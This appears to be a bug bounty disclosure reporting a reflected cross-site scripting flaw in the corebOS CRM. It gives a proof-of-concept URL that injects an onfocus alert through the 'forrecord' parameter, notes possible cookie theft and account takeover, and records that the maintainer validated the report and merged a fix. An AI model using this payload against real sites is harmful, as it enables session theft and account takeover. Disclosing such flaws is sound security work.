Cross-site Scripting (XSS) - Reflected in tsolucio/corebos

Valid

Reported on

Oct 31st 2021


Description

Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites

Proof of Concept.

// PoC.js
Link --> http://demo.corebos.com/index.php?module=cbSurvey&action=cbSurveyAjax&file=index&ajax=true&search=true&gname=&query=true&search_field=cbsurveyname&searchtype=BasicSearch&operator=s&type=alpbt&search_text=L&form=&forfield=&srcmodule=&forrecord=xss%22%20autofocus/onfocus=%22alert(5)%22%20id=%27xxx

Vulnerable parameter --> forrecord

Impact

This vulnerability is capable of claiming other users cookie performing other advanced scenarios . Account takeover is possible in this case .

Joe Bordes validated this vulnerability a month ago
0x9x has been awarded the disclosure bounty
The fix bounty is now up for grabs
0x9x
a month ago

Researcher


Thanks for your help too !

Joe Bordes confirmed that a fix has been merged on dcd094 a month ago
Joe Bordes has been awarded the fix bounty